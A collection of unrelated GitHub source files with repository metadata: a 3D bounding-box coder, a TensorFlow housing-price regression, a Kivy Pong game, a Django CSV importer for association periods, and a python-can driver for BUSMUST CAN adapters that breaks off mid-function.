data = get_data(config_path=parsed_args.config) | SrinivasGuntupalli/simple_dvc_demo | src/get_data.py | get_data.py | py | 1,015 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.safe_load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 29,
"usage_type": "call"
}
] |
72457648034 | import torch
from mmdet.core.bbox import BaseBBoxCoder
from mmdet.core.bbox.builder import BBOX_CODERS
@BBOX_CODERS.register_module()
class CameraBBoxCoder(BaseBBoxCoder):
def __init__(self, code_size=8):
self.code_size = code_size
def encode(self, dst_boxes):
targets = torch.zeros([dst_boxes.shape[0], self.code_size]).to(dst_boxes.device)
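        # Encoding layout, as read from the assignments below: slots 0-2 hold the center
        # (with y offset by half the height, dst_boxes[:, 4]), slots 3-5 the log-scaled
        # dimensions, slots 6-7 the yaw as (sin, cos), and slots 8-9 the optional velocity.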
targets[:, 3] = dst_boxes[:, 3].log()
targets[:, 4] = dst_boxes[:, 4].log()
targets[:, 5] = dst_boxes[:, 5].log()
targets[:, 6] = torch.sin(dst_boxes[:, 6])
targets[:, 7] = torch.cos(dst_boxes[:, 6])
targets[:, 0] = dst_boxes[:, 0]
targets[:, 1] = dst_boxes[:, 1] - 0.5 * dst_boxes[:, 4]
targets[:, 2] = dst_boxes[:, 2]
if self.code_size == 10:
targets[:, 8:10] = dst_boxes[:, 7:]
return targets
def decode(self, cls, rot, dim, center, vel):
"""Decode bboxes.
Args:
cls (torch.Tensor): Heatmap with the shape of [B, num_cls, num_proposals].
rot (torch.Tensor): Rotation with the shape of
[B, 2, num_proposals].
dim (torch.Tensor): Dim of the boxes with the shape of
[B, 3, num_proposals].
center (torch.Tensor): bev center of the boxes with the shape of
[B, 3, num_proposals]. (in feature map metric)
vel (torch.Tensor): Velocity with the shape of [B, 2, num_proposals].
Returns:
list[dict]: Decoded boxes.
"""
# class label
final_preds = cls.max(1, keepdims=False).indices
final_scores = cls.max(1, keepdims=False).values
dim[:, 0, :] = dim[:, 0, :].exp()
dim[:, 1, :] = dim[:, 1, :].exp()
dim[:, 2, :] = dim[:, 2, :].exp()
# dim = torch.exp(dim)
rots, rotc = rot[:, 0:1, :], rot[:, 1:2, :]
rot = torch.atan2(rots, rotc)
center = center.clone()
center[:, 1, :] = center[:, 1, :] + 0.5 * dim[:, 1, :]
if vel is None:
final_box_preds = torch.cat([center, dim, rot], dim=1).permute(0, 2, 1)
else:
final_box_preds = torch.cat([center, dim, rot, vel], dim=1).permute(0, 2, 1)
predictions_dicts = []
for i in range(cls.shape[0]):
boxes3d = final_box_preds[i]
scores = final_scores[i]
labels = final_preds[i]
predictions_dict = {
'bboxes': boxes3d,
'scores': scores,
'labels': labels
}
predictions_dicts.append(predictions_dict)
return predictions_dicts
@staticmethod
def decode_yaw(bbox, centers2d, cam2img):
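        # atan2(u - cx, fx) is the viewing-ray angle of the projected box center;
        # adding it converts the predicted local (allocentric) yaw into a global
        # (egocentric) yaw.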
bbox[:, 6] = torch.atan2(centers2d[:, 0] - cam2img[0, 2], cam2img[0, 0]) + bbox[:, 6]
return bbox
| yichen928/SparseFusion | mmdet3d/core/bbox/coders/camera_bbox_coder.py | camera_bbox_coder.py | py | 2,909 | python | en | code | 116 | github-code | 1 | [
{
"api_name": "mmdet.core.bbox.BaseBBoxCoder",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.sin",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "torch.cos",
"l... |
11939597532 | from __future__ import absolute_import, division, print_function
import tensorflow as tf
from tensorflow import keras
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
print('tensorflow version:', tf.__version__)
# 1) get data
boston_housing = keras.datasets.boston_housing
(train_data, train_labels), (test_data, test_labels) = boston_housing.load_data(path='boston_housing.npz')
print('Training set:{}'.format(train_data.shape)) # 404 examples, 13 features
print('Testing set:{}'.format(test_data.shape)) # 102 examples, 13 features
print(train_data[0])
column_names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD',
'TAX', 'PTRATIO', 'B', 'LSTAT']
df = pd.DataFrame(train_data, columns=column_names)
print(df.head())
print(train_labels[0:10])
# 2) feature normalize
mean = train_data.mean(axis=0)
std = train_data.std(axis=0)
train_data = (train_data - mean) / std
test_data = (test_data - mean) / std
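# Note that the test set is deliberately normalized with the *training* mean/std,
# so no information from the test data leaks into preprocessing.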
print(train_data[0])
# 3) create model
def build_model():
model = keras.Sequential([
keras.layers.Dense(64, activation=tf.nn.relu, input_shape=(train_data.shape[1],)),
keras.layers.Dense(64, activation=tf.nn.relu),
keras.layers.Dense(1)
])
optimizer = tf.train.RMSPropOptimizer(0.001)
model.compile(loss='mse', optimizer=optimizer, metrics=['mae'])
return model
model = build_model()
model.summary()
# 4) train the model
class PrintDot(keras.callbacks.Callback):
"""docstring for PrintDot"""
def on_epoch_end(self, epoch, logs):
if epoch % 100 == 0:
print('')
print('.', end='')
EPOCHS = 500
history = model.fit(train_data, train_labels, epochs=EPOCHS, validation_split=0.2, verbose=0, callbacks=[PrintDot()])
def plot_history(history):
plt.figure()
plt.xlabel('Epoch')
plt.ylabel('Mean Abs Error [1000$]')
plt.plot(history.epoch, np.array(history.history['mean_absolute_error']), label='Train Loss')
plt.plot(history.epoch, np.array(history.history['val_mean_absolute_error']), label='Val Loss')
plt.legend()
plt.ylim([0, 5])
# plt.show()
# plt.subplot(1,3,1)
plot_history(history)
# stop training early when the validation loss stops improving
model_early = build_model()
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)
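# patience=20: training stops once val_loss has failed to improve for 20 consecutive epochs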
history_early = model_early.fit(train_data, train_labels, epochs=EPOCHS, validation_split=0.2, verbose=0, callbacks=[early_stop, PrintDot()])
# plt.subplot(1,3,2)
plot_history(history_early)
# 5) evaluate test data
[loss, mae] = model.evaluate(test_data, test_labels, verbose=0)
print('Testing set Mean Abs Error:${:7.2f}'.format(mae*1000))
# 6) predict
test_prediction = model.predict(test_data).flatten()
# plt.subplot(1,3,3)
plt.figure()
plt.scatter(test_labels, test_prediction)
plt.xlabel('True Values [1000$]')
plt.ylabel('Prediction [1000$]')
plt.axis('equal')
plt.xlim(plt.xlim())
plt.ylim(plt.ylim())
_ = plt.plot([-100, 100], [-100, 100])
error = test_prediction - test_labels
plt.figure()
plt.hist(error, bins=50)
plt.xlabel('Prediction Error [1000$]')
plt.ylabel('Count')
plt.show()
| halazila/pythonLearn | tfLearn/houseprice_reg.py | houseprice_reg.py | py | 3,037 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow.__version__",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.datasets",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras",
"line_number": 12,
"usage_type": "name"
},
{
"api_na... |
30020287097 | import os
from random import randint
from functools import partial
from datetime import datetime
from config.log_config import LogConfig
from config.pong_enum import PathEnum, ButtonNamesEnum
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, StringProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.core.audio import SoundLoader
log_config = LogConfig()
logger = log_config.configurate_log()
class PongBall(Widget):
balls_list = os.listdir(PathEnum.BALLS_PATH_ENUM)
ball_image = StringProperty(PathEnum.BALLS_PATH_ENUM + '/' + balls_list[0])
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongPaddle(Widget):
score = NumericProperty(0)
def __init__(self, **kwargs):
super(PongPaddle, self).__init__(**kwargs)
self.bounce_sound = SoundLoader.load(PathEnum.BOUNCE_SOUND_PATH_ENUM)
def bounce_ball(self, ball):
if self.collide_widget(ball):
self.bounce_sound.play()
vx, vy = ball.velocity
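            # offset lies in [-1, 1]: hits near the paddle's edge deflect the ball more
            # steeply, and scaling the reflected vector by 1.15 speeds it up each bounce.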
offset = (ball.center_y - self.center_y) / (self.height / 2)
bounced = Vector(-1 * vx, vy)
vel = bounced * 1.15
ball.velocity = vel.x, vel.y + offset
logger.debug('Game: Ball bounced')
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
is_running = False
vs_ai = True
result = StringProperty('')
start_time = NumericProperty(0)
elapsed_time = NumericProperty(0)
backgrounds_list = os.listdir(PathEnum.BACKGROUNDS_PATH_ENUM)
background_image = StringProperty(PathEnum.BACKGROUNDS_PATH_ENUM + '/' + backgrounds_list[0])
def __init__(self, **kwargs):
super(PongGame, self).__init__(**kwargs)
self.start_button = None
self.mode_button = None
self.background_image_button = None
self.ball_button = None
self.white_sound = SoundLoader.load(PathEnum.WHITE_SOUND_PATH_ENUM)
self.move_paddle_event = None # Event for moving paddles
def change_background(self, instance):
logger.debug('UI: Background changed')
for i in range(len(self.backgrounds_list)):
if PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[i] == self.background_image:
if i + 1 == len(self.backgrounds_list):
self.background_image = PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[0]
break
else:
self.background_image = PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[i + 1]
break
def change_ball(self, instance):
logger.debug('UI: Ball changed')
for i in range(len(self.ball.balls_list)):
if PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[i] == self.ball.ball_image:
if i + 1 == len(self.ball.balls_list):
self.ball.ball_image = PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[0]
break
else:
self.ball.ball_image = PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[i + 1]
break
def serve_ball(self, vel=(8, 2)):
self.ball.center = self.center
        angle = randint(10, 60)  # random launch angle between 10 and 60 degrees
self.ball.velocity = Vector(vel[0], vel[1]).rotate(angle)
logger.debug('Game: Ball Start')
def update(self, dt):
if not self.is_running:
return
current_time = datetime.now().timestamp()
self.elapsed_time = current_time - self.start_time
self.ball.move()
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
if (self.ball.y < 0) or (self.ball.top > self.height):
self.ball.velocity_y *= -1
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(8, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-8, 0))
if self.vs_ai:
self.move_ai_paddle()
self.check_results()
def check_results(self):
if self.player1.score == 5 or self.player2.score == 5:
self.is_running = False
Clock.unschedule(self.update)
self.show_results()
def on_touch_move(self, touch):
if self.vs_ai:
if touch.x < self.width / 3:
self.player1.center_y = touch.y
else:
if touch.x < self.width / 3:
self.player1.center_y = touch.y
elif touch.x > self.width - self.width / 3:
self.player2.center_y = touch.y
def show_results(self):
logger.debug('UI: Pop up created')
if self.player1.score > self.player2.score:
winner = "Red Wins!"
else:
winner = "Blue Wins!"
logger.debug(f'Game: {winner}')
score_message = "Red Score: {}\nBlue Score: {}\nElapsed Time: {:.2f} seconds".format(
self.player1.score, self.player2.score, self.elapsed_time)
winner_label = Label(text=winner, font_size='40sp')
score_label = Label(text=score_message)
        # Create a BoxLayout to hold the Label widgets
layout = BoxLayout(orientation='vertical', padding=(0, 30))
layout.add_widget(winner_label)
layout.add_widget(score_label)
        # Create a Popup with the new content
message_box = Popup(title="Game Over", content=layout, size_hint=(None, None), size=(700, 700))
message_box.open()
self.return_to_main_menu()
def return_to_main_menu(self):
self.is_running = False
self.enable_menu()
self.reset_score()
Clock.unschedule(self.update)
self.ball.velocity = (0, 0)
self.ball.center = self.center
self.serve_ball() # Serve the ball for the next match
self.start_time = 0
self.elapsed_time = 0
logger.debug('Game: Returned to main menu')
def start_game(self, instance):
self.is_running = True
self.disable_menu()
self.reset_score()
self.serve_ball()
self.start_time = datetime.now().timestamp()
logger.debug('Game: Match started')
if self.vs_ai:
self.player2.center_y = self.center_y
Clock.unschedule(self.update) # Unscheduling previous updates
Clock.schedule_interval(self.update, 1.0 / 60) # Schedule the update again
# Start moving paddles
self.move_paddle_event = Clock.schedule_interval(partial(self.move_paddles), 1.0 / 60)
def reset_score(self):
self.player1.score = 0
self.player2.score = 0
def switch_mode(self, instance):
self.vs_ai = not self.vs_ai
instance.text = "AI Mode" if self.vs_ai else "2 Players Mode"
logger.debug('Game: Mode switched to AI Mode' if self.vs_ai else 'Game: Mode switched to 2 Players')
def move_paddles(self, dt):
if self.vs_ai:
self.move_ai_paddle()
def move_ai_paddle(self):
if self.ball.center_y > self.player2.center_y:
self.player2.center_y += min(4.5, self.ball.center_y - self.player2.center_y)
elif self.ball.center_y < self.player2.center_y:
self.player2.center_y -= min(4.5, self.player2.center_y - self.ball.center_y)
def disable_menu(self):
self.start_button.disabled = True
self.start_button.opacity = 0
self.mode_button.disabled = True
self.mode_button.opacity = 0
self.background_image_button.disabled = True
self.background_image_button.opacity = 0
self.ball_button.disabled = True
self.ball_button.opacity = 0
def enable_menu(self):
self.start_button.disabled = False
self.start_button.opacity = 1
self.mode_button.disabled = False
self.mode_button.opacity = 1
self.background_image_button.disabled = False
self.background_image_button.opacity = 1
self.ball_button.disabled = False
self.ball_button.opacity = 1
class PongApp(App):
def build(self):
game = PongGame()
layout = BoxLayout(orientation='vertical', spacing=20, padding=(30, 0, 0, 0))
game.start_button = Button(text=ButtonNamesEnum.START_BTN_ENUM, size_hint=(None, None), size=(290, 100))
game.start_button.bind(on_press=game.start_game)
layout.add_widget(game.start_button)
game.mode_button = Button(text=ButtonNamesEnum.GAME_MODE_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.mode_button.bind(on_press=game.switch_mode)
layout.add_widget(game.mode_button)
game.background_image_button = Button(text=ButtonNamesEnum.CHANGE_TABLE_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.background_image_button.bind(on_press=game.change_background)
layout.add_widget(game.background_image_button)
game.ball_button = Button(text=ButtonNamesEnum.CHANGE_BALL_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.ball_button.bind(on_press=game.change_ball)
layout.add_widget(game.ball_button)
layout.add_widget(Widget(size_hint=(1, 1)))
game.add_widget(layout)
# Play the chill.mp3 song
game.white_sound.loop = True
game.white_sound.volume = 0.08
game.white_sound.play()
logger.debug('Game: Game started')
return game
if __name__ == '__main__':
PongApp().run()
| ivan1dze/kivy | main.py | main.py | py | 10,431 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "config.log_config.LogConfig",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "kivy.uix.widget.Widget",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "config.... |
27639072195 | import csv
import datetime
import logging
from sme_ptrf_apps.core.models import Associacao, Periodo
from sme_ptrf_apps.core.models.arquivo import (
DELIMITADOR_PONTO_VIRGULA,
DELIMITADOR_VIRGULA,
ERRO,
PROCESSADO_COM_ERRO,
SUCESSO,
)
logger = logging.getLogger(__name__)
CODIGO_EOL = 0
PERIODO = 1
__DELIMITADORES = {',': DELIMITADOR_VIRGULA, ';': DELIMITADOR_PONTO_VIRGULA}
def processa_periodo_inicial(reader, arquivo):
logs = ""
importados = 0
erros = 0
for index, row in enumerate(reader):
if index != 0:
logger.info('Linha %s: %s', index, row)
associacao = get_associacao(str(row[CODIGO_EOL]).strip())
if not associacao:
msg_erro = f"Associação ({str(row[CODIGO_EOL])}) não encontrado. Linha: {index}"
logger.info(msg_erro)
logs = f"{logs}\n{msg_erro}"
erros += 1
continue
periodo = get_periodo(str(row[PERIODO]).strip())
if not periodo:
msg_erro = f"Período ({str(row[PERIODO])}) não encontrado. Linha: {index}"
logger.info(msg_erro)
logs = f"{logs}\n{msg_erro}"
erros += 1
continue
associacao.periodo_inicial = periodo
associacao.save()
logger.info("Periodo inicial da associação %s importado com sucesso.", associacao)
importados += 1
if importados > 0 and erros > 0:
arquivo.status = PROCESSADO_COM_ERRO
elif importados == 0:
arquivo.status = ERRO
else:
arquivo.status = SUCESSO
logs = f"{logs}\nImportados {importados} períodos iniciais. Erro na importação de {erros} períodos iniciais."
logger.info(f'Importados {importados} períodos iniciais. Erro na importação de {erros} períodos iniciais.')
arquivo.log = logs
arquivo.save()
def get_associacao(eol):
if Associacao.objects.filter(unidade__codigo_eol=eol).exists():
return Associacao.objects.filter(unidade__codigo_eol=eol).get()
return None
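# Note: filter(...).exists() followed by .get() issues two queries; a near-equivalent
# single-query sketch would be:
#     return Associacao.objects.filter(unidade__codigo_eol=eol).first()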
def get_periodo(referencia):
if Periodo.objects.filter(referencia=referencia).exists():
return Periodo.objects.filter(referencia=referencia).get()
return None
def carrega_periodo_inicial(arquivo):
logger.info("Executando Carga de Período inicial para associações.")
arquivo.ultima_execucao = datetime.datetime.now()
try:
with open(arquivo.conteudo.path, 'r', encoding="utf-8") as f:
sniffer = csv.Sniffer().sniff(f.readline())
f.seek(0)
if __DELIMITADORES[sniffer.delimiter] != arquivo.tipo_delimitador:
msg_erro = f"Formato definido ({arquivo.tipo_delimitador}) é diferente do formato do arquivo csv ({__DELIMITADORES[sniffer.delimiter]})"
logger.info(msg_erro)
arquivo.status = ERRO
arquivo.log = msg_erro
arquivo.save()
return
reader = csv.reader(f, delimiter=sniffer.delimiter)
processa_periodo_inicial(reader, arquivo)
logger.info("Carga de Períodos efetuada com sucesso.")
except Exception as err:
logger.info("Erro ao processar períodos: %s", str(err))
arquivo.log = "Erro ao processar períodos."
arquivo.save()
| rochalet/SME-PTRF-BackEnd | sme_ptrf_apps/core/services/periodo_inicial.py | periodo_inicial.py | py | 3,373 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sme_ptrf_apps.core.models.arquivo.DELIMITADOR_VIRGULA",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sme_ptrf_apps.core.models.arquivo.DELIMITADOR_PONTO_VIRGULA",
"line_n... |
24877020550 | # coding: utf-8
"""
Ctypes wrapper module for BUSMUST CAN Interface on win32/win64 systems.
Authors: busmust <busmust@126.com>, BUSMUST Co.,Ltd.
"""
# Import Standard Python Modules
# ==============================
import ctypes
import logging
import sys
import time
try:
# Try builtin Python 3 Windows API
from _winapi import WaitForSingleObject, INFINITE
HAS_EVENTS = True
except ImportError:
try:
# Try pywin32 package
from win32event import WaitForSingleObject, INFINITE
HAS_EVENTS = True
except ImportError:
# Use polling instead
HAS_EVENTS = False
# Import Modules
# ==============
from can import BusABC, Message, CanError
from can.bus import BusState
from can.util import len2dlc, dlc2len
from .exceptions import BmError
# Define Module Logger
# ====================
LOG = logging.getLogger(__name__)
# Import safely Vector API module for Travis tests
bmapi = None
try:
from . import bmapi
except Exception as exc:
LOG.warning('Could not import bmapi: %s', exc)
class BmCanBus(BusABC):
"""The CAN Bus implemented for the BUSMUST USB-CAN interface."""
__initialized = False
@classmethod
def __init_class__(cls):
if bmapi is None:
raise ImportError("The BMAPI has not been loaded")
if not BmCanBus.__initialized:
bmapi.BM_Init()
BmCanBus.__initialized = True
def __init__(self, channel,
fd=True, receive_own_messages=False, listen_only=False,
bitrate=500000, data_bitrate=500000,
tres=False,
can_filters=None,
**kwargs):
"""
:param int channel:
            The channel index to create this bus with, i.e. an index into the list of available channels returned when enumerating Busmust devices.
            Can also be a string holding the channel's full name, e.g. "BM-CANFD-X1-PRO(1234) CH1".
:param bool fd:
If CAN-FD frames should be supported.
:param bool receive_own_messages:
            If loopback mode should be enabled, so that transmitted frames are also received.
:param bool listen_only:
            If listen-only mode should be enabled; this is the same as setting the 'state' property to PASSIVE.
:param int bitrate:
Bitrate in bits/s.
:param int data_bitrate:
Which bitrate to use for data phase in CAN FD.
Defaults to arbitration bitrate.
:param bool tres:
            If the 120 Ohm CAN termination resistor should be enabled.
"""
BmCanBus.__init_class__()
self._bmapi = bmapi # Enable external access
infolist = bmapi.BM_ChannelInfoListTypeDef()
numOfInfo = ctypes.c_int(len(infolist.entries))
bmapi.BM_Enumerate(ctypes.byref(infolist), ctypes.byref(numOfInfo))
if isinstance(channel, int):
if channel < numOfInfo.value:
self._channelinfo = infolist.entries[channel]
else:
raise BmError(bmapi.BM_ERROR_NODRIVER, "Channel %d is not connected or is in use by another app." % channel, "BmCanBus.__init__")
elif isinstance(channel, str):
for info in infolist.entries:
if info.name.decode() == channel:
self._channelinfo = info
break
else:
raise BmError(bmapi.BM_ERROR_NODRIVER, "Channel %s is not connected or is in use by another app." % channel, "BmCanBus.__init__")
self._mode = bmapi.BM_CAN_NORMAL_MODE
if not fd:
self._mode = bmapi.BM_CAN_CLASSIC_MODE
elif receive_own_messages:
self._mode = bmapi.BM_CAN_EXTERNAL_LOOPBACK_MODE
elif listen_only:
self._mode = bmapi.BM_CAN_LISTEN_ONLY_MODE
self._tres = bmapi.BM_TRESISTOR_DISABLED
if tres:
self._tres = bmapi.BM_TRESISTOR_120
self._bitrate = bmapi.BM_BitrateTypeDef()
self._bitrate.nbitrate = int(bitrate / 1000)
self._bitrate.dbitrate = int(data_bitrate / 1000)
self._handle = bmapi.BM_ChannelHandle()
bmapi.BM_OpenEx(
ctypes.byref(self._handle),
ctypes.byref(self._channelinfo),
self._mode,
self._tres,
ctypes.byref(self._bitrate),
ctypes.cast(ctypes.c_void_p(), ctypes.POINTER(bmapi.BM_RxFilterListTypeDef)), 0
)
self.channel_info = self._channelinfo.name.decode()
startTimestamp = ctypes.c_uint32()
bmapi.BM_GetTimestamp(self._handle, ctypes.byref(startTimestamp))
self._time_offset = time.time() - startTimestamp.value * 1e-9
self._notification = bmapi.BM_NotificationHandle()
bmapi.BM_GetNotification(self._handle, ctypes.byref(self._notification))
super(BmCanBus, self).__init__(channel=channel, can_filters=can_filters, **kwargs)
time.sleep(0.05)
self._state = BusState.ACTIVE
self._isotp_config = bmapi.BM_IsotpConfigTypeDef()
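    # Minimal usage sketch (channel and bitrates are illustrative assumptions):
    #   bus = BmCanBus(channel=0, fd=True, bitrate=500000, data_bitrate=2000000)
    #   bus.send(Message(arbitration_id=0x123, data=[1, 2, 3], is_extended_id=False))
    #   msg = bus.recv(timeout=1.0)  # recv() is inherited from can.BusABC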
def _apply_filters(self, filters):
if filters:
# Only up to one filter per ID type allowed
if len(filters) == 1 or (len(filters) == 2 and filters[0].get("extended") != filters[1].get("extended")):
bmfilters = bmapi.BM_RxFilterListTypeDef()
try:
for i in range(len(filters)):
can_filter = filters[i]
bmfilters.entries[i].type = bmapi.BM_RXFILTER_BASIC
bmfilters.entries[i].flags_mask = bmapi.BM_MESSAGE_FLAGS_IDE
if can_filter.get("extended"):
bmfilters.entries[i].flags_value = bmapi.BM_MESSAGE_FLAGS_IDE
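                        # Pack the 29-bit extended ID into the controller's word layout:
                        # the top 11 bits become the SID (low bits of the packed word)
                        # and the low 18 bits become the EID, shifted up by 11.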
bmfilters.entries[i].id_mask = (can_filter["can_mask"] >> 18) | ((can_filter["can_mask"] & 0x3FFFF) << 11)
bmfilters.entries[i].id_value = (can_filter["can_id"] >> 18) | ((can_filter["can_id"] & 0x3FFFF) << 11)
else:
bmfilters.entries[i].flags_value = 0
bmfilters.entries[i].id_mask = can_filter["can_mask"]
bmfilters.entries[i].id_value = can_filter["can_id"]
bmapi.BM_SetRxFilters(self._handle, ctypes.byref(bmfilters), len(bmfilters.entries))
time.sleep(0.05)
except BmError as exc:
LOG.warning("Could not set filters: %s", exc)
# go to fallback
else:
self._is_filtered = True
return
else:
LOG.warning("Only up to one filter per extended or standard ID allowed")
# go to fallback
# fallback: reset filters
self._is_filtered = False
try:
bmfilters = bmapi.BM_RxFilterListTypeDef() # Default as invalid => allow all messages to pass
bmapi.BM_SetRxFilters(self._handle, ctypes.byref(bmfilters), 2)
time.sleep(0.05)
except BmError as exc:
LOG.warning("Could not reset filters: %s", exc)
def _recv_internal(self, timeout):
end_time = time.time() + timeout if timeout is not None else None
bmmsg = bmapi.BM_CanMessageTypeDef()
channel = ctypes.c_uint32()
timestamp = ctypes.c_uint32()
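# Poll the driver receive queue; when it is empty, block on the notification
# handle until a frame arrives or the timeout expires.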
while True:
try:
bmapi.BM_ReadCanMessage(self._handle, ctypes.byref(bmmsg), ctypes.byref(channel), ctypes.byref(timestamp))
except BmError as exc:
if exc.error_code != bmapi.BM_ERROR_QRCVEMPTY:
raise
else:
msg_id = bmmsg.mid.getExtendedId() if bmmsg.ctrl.rx.IDE else bmmsg.mid.getStandardId()
dlc = dlc2len(bmmsg.ctrl.rx.DLC)
msg = Message(
timestamp=timestamp.value * 1e-6 + self._time_offset,
arbitration_id=msg_id & 0x1FFFFFFF,
is_extended_id=bool(bmmsg.ctrl.rx.IDE),
is_remote_frame=bool(bmmsg.ctrl.rx.RTR),
is_error_frame=False,
is_fd=bool(bmmsg.ctrl.rx.FDF),
error_state_indicator=bool(bmmsg.ctrl.rx.ESI),
bitrate_switch=bool(bmmsg.ctrl.rx.BRS),
dlc=dlc,
data=bmmsg.payload[:dlc],
channel=channel.value)
return msg, self._is_filtered
if end_time is not None and time.time() > end_time:
return None, self._is_filtered
# Wait for receive event to occur
if timeout is None:
time_left_ms = INFINITE
else:
time_left = end_time - time.time()
time_left_ms = max(0, int(time_left * 1000))
bmapi.BM_WaitForNotifications(ctypes.byref(self._notification), 1, time_left_ms)
def send(self, msg, timeout=None):
bmmsg = bmapi.BM_CanMessageTypeDef()
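# Split a 29-bit extended ID into the 11-bit SID and 18-bit EID fields expected by BMAPI.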
if msg.is_extended_id:
bmmsg.mid.SID = msg.arbitration_id >> 18
bmmsg.mid.EID = (msg.arbitration_id & 0x3FFFF)
else:
bmmsg.mid.SID = msg.arbitration_id
bmmsg.mid.EID = 0
bmmsg.ctrl.tx.IDE = 1 if msg.is_extended_id else 0
bmmsg.ctrl.tx.FDF = 1 if msg.is_fd else 0
bmmsg.ctrl.tx.BRS = 1 if msg.bitrate_switch else 0
bmmsg.ctrl.tx.RTR = 1 if msg.is_remote_frame else 0
bmmsg.ctrl.tx.ESI = 1 if msg.error_state_indicator else 0
bmmsg.ctrl.tx.DLC = len2dlc(msg.dlc)
bmmsg.payload[:len(msg.data)] = msg.data
timestamp = ctypes.c_uint32()
bmapi.BM_WriteCanMessage(self._handle, ctypes.byref(bmmsg), 0, int(timeout*1000) if timeout is not None else -1, ctypes.byref(timestamp))
def shutdown(self):
bmapi.BM_Close(self._handle)
self._handle = bmapi.BM_ChannelHandle()
def reset(self):
bmapi.BM_Reset(self._handle)
@property
def state(self):
return self._state
@state.setter
def state(self, new_state):
mode_changed = False
self._state = new_state
if new_state is BusState.ACTIVE:
if self._mode == bmapi.BM_CAN_OFF_MODE or self._mode == bmapi.BM_CAN_LISTEN_ONLY_MODE:
self._mode = bmapi.BM_CAN_NORMAL_MODE
mode_changed = True
else:
pass # Do not change (i.e. loopback)
elif new_state is BusState.PASSIVE:
# When this mode is set, the CAN controller does not take part in active events (e.g. transmitting CAN messages)
# but stays in a passive mode (CAN monitor), in which it can analyse the traffic on the CAN bus used by a BMCAN channel.
if self._mode != bmapi.BM_CAN_LISTEN_ONLY_MODE:
self._mode = bmapi.BM_CAN_LISTEN_ONLY_MODE
mode_changed = True
if mode_changed:
bmapi.BM_SetCanMode(self._handle, self._mode)
@classmethod
def enumerate(cls):
BmCanBus.__init_class__()
infolist = bmapi.BM_ChannelInfoListTypeDef()
numOfInfo = ctypes.c_int(len(infolist.entries))
bmapi.BM_Enumerate(ctypes.byref(infolist), ctypes.byref(numOfInfo))
channellist = []
for i in range(numOfInfo.value):
channellist.append({
'index': i,
'name': infolist.entries[i].name.decode(),
# Add other exports here
})
return channellist
def send_isotp(self, payload, timeout=-1):
timeout_ms = int(timeout * 1000.0) if timeout >= 0 else -1
bmapi.BM_WriteIsotp(self._handle, ctypes.c_char_p(payload), len(payload), timeout_ms, ctypes.byref(self._isotp_config))
def receive_isotp(self, timeout=-1, max_len=4095):
timeout_ms = int(timeout * 1000.0) if timeout >= 0 else -1
buf = ctypes.create_string_buffer(max_len)
received_len = ctypes.c_uint32(len(buf))
bmapi.BM_ReadIsotp(self._handle, buf, ctypes.byref(received_len), timeout_ms, ctypes.byref(self._isotp_config))
return bytes(buf[:received_len.value])
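# ISO-TP usage sketch (the diagnostic IDs and payload are hypothetical):
#   bus.config_isotp(tester_msg_id=0x7E0, ecu_msg_id=0x7E8, fd=True)
#   bus.send_isotp(b'\x22\xf1\x90')
#   response = bus.receive_isotp(timeout=1.0)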
def config_isotp(self, tester_msg_id, ecu_msg_id, mode=bmapi.BM_ISOTP_NORMAL_TESTER, **kwargs):
self._isotp_config.mode = mode
enable_fdf = kwargs.get('fd', False) or kwargs.get('fdf', False)
enable_brs = kwargs.get('brs', enable_fdf)
enable_ide = kwargs.get('ide', False) or tester_msg_id > 0x7FF or ecu_msg_id > 0x7FF
dlc = kwargs.get('dlc', 0xF if enable_fdf else 0x8)
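# Build the tester-side (request) and ECU-side (response) CAN frame templates with the resolved flags.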
testerMsg = self._isotp_config.testerDataTemplate.getCanMessage()
testerMsg.ctrl.tx.FDF = enable_fdf
testerMsg.ctrl.tx.BRS = enable_brs
testerMsg.ctrl.tx.IDE = enable_ide
testerMsg.ctrl.tx.DLC = dlc
testerMsg.setMessageId(tester_msg_id)
self._isotp_config.testerDataTemplate.setCanMessage(testerMsg)
ecuMsg = self._isotp_config.ecuDataTemplate.getCanMessage()
